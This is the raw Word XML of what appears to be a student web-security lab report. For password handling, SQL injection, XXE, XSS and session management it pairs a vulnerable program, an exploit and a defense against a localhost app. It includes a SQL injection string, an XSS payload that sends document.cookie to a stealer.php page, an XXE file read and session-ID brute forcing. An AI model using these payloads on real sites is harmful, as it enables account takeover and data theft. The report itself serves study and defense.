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Default="00BA7599" w:rsidP="00884A33">
      <w:pPr>
        <w:pStyle w:val="Titre20"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7599">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kevin Valerio  -   </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00884A33" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>valerio.kevin83@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00486534" w:rsidRPr="00884A33" w:rsidRDefault="00884A33" w:rsidP="00884A33">
      <w:pPr>
        <w:pStyle w:val="Titre20"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00884A33">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This projet has been made alone</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableauGrille1Clair-Accentuation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2C19" w:rsidTr="00BA7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2C19" w:rsidRDefault="001C2C19" w:rsidP="00B823AA">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
            <w:r>
              <w:t>V</w:t>
            </w:r>
            <w:r w:rsidRPr="001C2C19">
              <w:t>ulnerable code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001C2C19" w:rsidRDefault="001C2C19" w:rsidP="00B823AA">
            <w:pPr>
              <w:pStyle w:val="Titre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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001C2C19" w:rsidRDefault="001C2C19" w:rsidP="00B823AA">
            <w:pPr>
              <w:pStyle w:val="Titre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Defense code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Pr="00BA7599" w:rsidRDefault="001D2DCB" w:rsidP="001D2DCB">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA7599">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>XSS #1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2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  <w:tabs>
                <w:tab w:val="left" w:pos="1189"/>
                <w:tab w:val="center" w:pos="1394"/>
              </w:tabs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3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4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5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6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8C0679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C0679" w:rsidRDefault="008C0679" w:rsidP="008C0679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7</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA7599">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C0679" w:rsidRDefault="008C0679" w:rsidP="008C0679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8C0679" w:rsidRDefault="008C0679" w:rsidP="008C0679">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008C0679" w:rsidRDefault="008C0679" w:rsidP="008C0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8C0679" w:rsidRDefault="008C0679" w:rsidP="008C0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8C0679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C0679" w:rsidRDefault="008C0679" w:rsidP="008C0679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8</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA7599">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C0679" w:rsidRDefault="008C0679" w:rsidP="008C0679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8C0679" w:rsidRPr="00BA7599" w:rsidRDefault="008C0679" w:rsidP="008C0679">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008C0679" w:rsidRPr="001B7A46" w:rsidRDefault="008C0679" w:rsidP="008C0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8C0679" w:rsidRPr="001B7A46" w:rsidRDefault="008C0679" w:rsidP="008C0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053CEC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53CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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9</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA7599">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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053CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00053CEC" w:rsidRPr="001B7A46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053CEC" w:rsidRPr="001B7A46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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA7599">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>DOM-Based XSS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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Sesssion Management #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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Sesssion Management #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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Sesssion Management #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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 Storage</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
            <w:r>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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XML External Entity</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRPr="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC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53CEC" w:rsidRPr="00BA7599" w:rsidRDefault="00053CEC" w:rsidP="00053CEC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SQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053CEC">
            <w:pPr>
              <w:pStyle w:val="Titre20"/>
            </w:pPr>
            <w:r>
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005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053CEC" w:rsidRDefault="00053CEC" w:rsidP="00053C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</w:tbl>
    <w:p w:rsidR="00592C58" w:rsidRDefault="00592C58" w:rsidP="00592C58">
      <w:pPr>
        <w:pStyle w:val="Titre20"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D2DCB" w:rsidRDefault="00592C58" w:rsidP="001D2DCB">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00E9591E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Password management </w:t>
      </w:r>
      <w:r w:rsidR="00BD5BDF">
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00F24CCB" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Titre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FB9E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-635737</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>276461</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7088036" cy="1540938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4" b="45417"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7088036" cy="154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DCB">
        <w:t>Vulnerable program</w:t>
      </w:r>
      <w:r w:rsidR="00CF5FA7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D2DCB" w:rsidRDefault="001D2DCB" w:rsidP="001D2DCB">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D2DCB" w:rsidRDefault="001D2DCB" w:rsidP="001D2DCB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="004A7732">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/Password%20Management/attack/?username=xxx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> OR ‘1’=’1’—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D2DCB" w:rsidRDefault="001D2DCB" w:rsidP="001D2DCB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste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7608C8B6" wp14:editId="60CDECE9">
            <wp:extent cx="5133975" cy="24765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05" w:rsidRDefault="002D0905" w:rsidP="002D0905">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password is not hashed. Meaning everyone can use this password and log-in with it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D0905" w:rsidRDefault="002D0905" w:rsidP="002D0905">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D2DCB" w:rsidRDefault="00C63279" w:rsidP="001D2DCB">
      <w:pPr>
        <w:pStyle w:val="Titre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08A7C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-553085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>347980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6977380" cy="2296160"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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DCB">
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00070047" w:rsidRDefault="00070047" w:rsidP="00C63279"/>
    <w:p w:rsidR="00C63279" w:rsidRPr="00884A33" w:rsidRDefault="00070047" w:rsidP="00F24CCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>We use</w:t>
      </w:r>
      <w:r w:rsidR="00F24CCB">
        <w:t xml:space="preserve"> the Bcrypt algorithm, with a cost of 12 (recommended), in order to hash the SHA256 value of the concatenation of a pepper and the plain-text password.</w:t>
      </w:r>
      <w:r w:rsidR="00884A33">
        <w:t xml:space="preserve"> Salt is included in the default implementation of </w:t>
      </w:r>
      <w:r w:rsidR="00884A33">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r w:rsidR="00884A33">
        <w:t>() function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24CCB" w:rsidRDefault="00F24CCB" w:rsidP="00F24CCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F24CCB" w:rsidRPr="00C63279" w:rsidRDefault="00F24CCB" w:rsidP="00F24CCB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00CF5FA7" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00C63279">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C63279">
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00CF5FA7" w:rsidP="00990C16">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F83ADA" wp14:editId="4075A685">
            <wp:extent cx="5433237" cy="30619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2295" cy="30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79" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="004A7732">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/Password%20Management/attack/?username=xxx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> OR ‘1’=’1’—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste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0EA5F29" wp14:editId="5A5179F1">
            <wp:extent cx="5133975" cy="247650"/>
            <wp:effectExtent l="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79" w:rsidRDefault="00CF5FA7" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have access to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> table content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C63279">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRPr="00CF5FA7" w:rsidRDefault="00CF5FA7" w:rsidP="00990C16">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04286892" wp14:editId="5B9F5E03">
            <wp:extent cx="4748280" cy="1860698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4867" cy="19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7" w:rsidRDefault="00CF5FA7" w:rsidP="00CF5FA7">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF5FA7">
        <w:t>XML External Entity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRDefault="00CF5FA7" w:rsidP="00CF5FA7">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRDefault="00CF5FA7" w:rsidP="00990C16">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C3CC4E" wp14:editId="76CC6A61">
            <wp:extent cx="4867275" cy="18954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7" w:rsidRDefault="00990C16" w:rsidP="00CF5FA7">
      <w:pPr>
        <w:pStyle w:val="Titre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B6753C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>226222</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6343601" cy="3062177"/>
            <wp:effectExtent l="0" t="0" r="635" b="508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01" cy="3062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A7">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRDefault="00FE1DDD" w:rsidP="00FE1DDD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We can read C:\secret.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRPr="00CF5FA7" w:rsidRDefault="00CF5FA7" w:rsidP="00CF5FA7">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF5FA7" w:rsidRPr="00C63279" w:rsidRDefault="00CF5FA7" w:rsidP="00990C16">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337ABFE6" wp14:editId="53459D19">
            <wp:extent cx="3806456" cy="1393825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120" cy="14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E2" w:rsidRDefault="00966DE2" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r w:rsidRPr="00966DE2">
        <w:t>Session Management</w:t>
      </w:r>
      <w:r w:rsidR="007E128B">
        <w:t xml:space="preserve"> (part </w:t>
      </w:r>
      <w:r w:rsidR="007E128B" w:rsidRPr="001C1770">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidR="00884A33">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, session stealing</w:t>
      </w:r>
      <w:r w:rsidR="007E128B">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="4"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966DE2" w:rsidRDefault="00966DE2" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966DE2" w:rsidRDefault="00E9798F" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298F5DDE" wp14:editId="74B06EF0">
            <wp:extent cx="5731510" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="254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E2" w:rsidRDefault="00966DE2" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E128B" w:rsidRPr="00085616" w:rsidRDefault="00085616" w:rsidP="00085616">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Send</w:t>
      </w:r>
      <w:r w:rsidR="00E9798F">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he following link to the victim : </w:t>
      </w:r>
      <w:r w:rsidRPr="00085616">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://127.0.0.1/?name=&lt;script&gt;document.location=("http://127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00085616">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00085616">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/stealer.php?cookies=".concat(document.cookie));&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085616" w:rsidRDefault="00085616" w:rsidP="00085616">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Get the stolen session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085616" w:rsidRPr="007E128B" w:rsidRDefault="001C1770" w:rsidP="00085616">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the session to the stolen one </w:t>
      </w:r>
      <w:r w:rsidR="00085616">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10355E65" wp14:editId="5B76EA4E">
            <wp:extent cx="2552700" cy="2095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E2" w:rsidRDefault="00966DE2" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966DE2" w:rsidRPr="00CF5FA7" w:rsidRDefault="00966DE2" w:rsidP="00966DE2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966DE2" w:rsidRPr="00C63279" w:rsidRDefault="001C1770" w:rsidP="00966DE2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C8E4054" wp14:editId="45242A7C">
            <wp:extent cx="5731510" cy="1526540"/>
            <wp:effectExtent l="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70" w:rsidRDefault="001C1770">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1770" w:rsidRDefault="001C1770" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r w:rsidRPr="00966DE2">
        <w:t>Session Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (part </w:t>
      </w:r>
      <w:r w:rsidRPr="001C1770">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidR="00EF7455">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, bad session ID entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="5"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45E65" w:rsidRPr="00A45E65" w:rsidRDefault="00A45E65" w:rsidP="00A45E65"/>
    <w:p w:rsidR="001C1770" w:rsidRDefault="001C1770" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1770" w:rsidRDefault="00EF7455" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503601AB" wp14:editId="6472D0FF">
            <wp:extent cx="4886325" cy="8382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70" w:rsidRDefault="001C1770" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1770" w:rsidRDefault="00EF7455" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Generate a list of numbers from 1 to 999999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7455" w:rsidRPr="007E128B" w:rsidRDefault="00EF7455" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bruteforce the session with each number</w:t>
      </w:r>
    </w:p>
